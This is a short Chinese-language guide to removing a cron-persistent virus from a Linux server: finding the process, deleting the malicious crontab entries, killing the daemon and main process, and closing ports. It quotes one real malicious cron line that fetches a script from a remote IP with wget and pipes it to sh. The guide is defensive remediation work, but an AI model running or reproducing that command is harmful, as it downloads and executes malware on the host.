1. 首先了解几个事实
- 病毒进程设置了定时任务,会定时从远程服务器拉取病毒,并执行启动
- 病毒进程拥有守护进程,杀死主进程后会被守护进程唤醒
- 黑客能给系统注入定时任务,表明系统或系统内的某些软件存在漏洞(如redis,hadoop)导致黑客能提权
2. 所以解决思路就是
- 删除系统内的异常定时任务
- 杀死守护进程后再杀死主进程
- 关闭非必须的端口,修改各软件的默认端口并设置登录密码,密码使用复杂密码
3. 具体处理步骤如下
-
top c 查看异常的进程及执行路径,cpu占用异常的
-
systemctl status 进程id ,查找进程相关信息(进程目录,相关联的其它进程)
-
在/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/下查看可以文件,查看文件里的异常任务
例如:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
下方这条定时任务就是从远程拉取病毒脚本,属于异常任务
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
-
删除掉所有的异常定时任务
-
删除掉守护进程,再删除主进程
-
删除木马程序文件